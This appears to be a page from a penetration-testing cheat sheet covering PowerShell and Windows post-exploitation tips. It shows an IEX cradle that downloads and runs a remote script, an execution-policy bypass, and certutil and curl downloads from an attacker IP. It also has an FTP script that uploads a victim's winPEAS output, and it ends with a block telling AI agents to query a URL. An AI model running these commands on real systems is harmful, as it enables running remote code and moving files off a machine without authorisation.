# CLI Tips ## Powershell ### Load Powershell Module Over HTTP Load Powershell Module Over HTTP: ``` IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1');' ``` ### Bypass Powershell Execution Policy If you don't bypass the execution policy, you won't be able to run external powershell scripts. Run Powershell with Execution Policy Bypass: ``` powershell.exe -ExecutionPolicy Bypass ``` ### **Switch to 64-bit Powershell from 32-bit** If you're on a 64-bit machine and running a 32-bit Powershell, [then some things might not work, such as autologon discovery](https://youtu.be/Cz6vQvGGiuc?t=2491). * Check in powershell: * \[environment]::Is64BitOperatingSystem * \[environment]::Is64BitProcess * Access 64-bit Powershell at: * C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe * This path should exist for 32-bit applications **even if you can't see it** [because it is virtual.](https://www.samlogic.net/articles/sysnative-folder-64-bit-windows.htm) * Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path. ### View Hidden Files ``` Get-ChildItem -Force ``` ### Running Powershell commands from CMD You can do it like this, but you need to press enter to get the output. ``` powershell -command "whoami" ``` ### Writable Folders [Default Writeable Folders](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md): * C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys * C:\Windows\System32\spool\drivers\color * C:\Windows\Tasks * C:\Windows\tracing * C:\Windows\Temp * C:\Users\Public ### Transferring Files {% embed url="" %} #### HTTP Download Start an HTTP server on your Linux machine: ``` python3 -m http.server ``` Download file over HTTP using curl (in case it's installed in Powershell): ``` curl http://IP:PORT/file.exe -O ./file.exe ``` Download file using certutil: ``` certutil.exe -f -urlcache http://IP:PORT/path/filename.exe filename.exe ``` #### FTP Upload Start an FTP server on your linux machine: ``` pip3 install pyftpdlib python3 -m pyftpdlib --username myuser --password mypass --write ``` If you don't specify username and password, then you can log in with user anonymous and no password. ``` $File = "C:\Users\svc-alfresco\Documents\winpeas.txt"; $ftp = "ftp://myuser:mypass@10.10.14.141:2121/winpeas.txt"; $webclient = New-Object -TypeName System.Net.WebClient; $uri = New-Object -TypeName System.Uri -ArgumentList $ftp; $webclient.UploadFile($uri, $File); ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://heinosass.gitbook.io/leet-sheet/post-exploitation/untitled/cli-tips.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.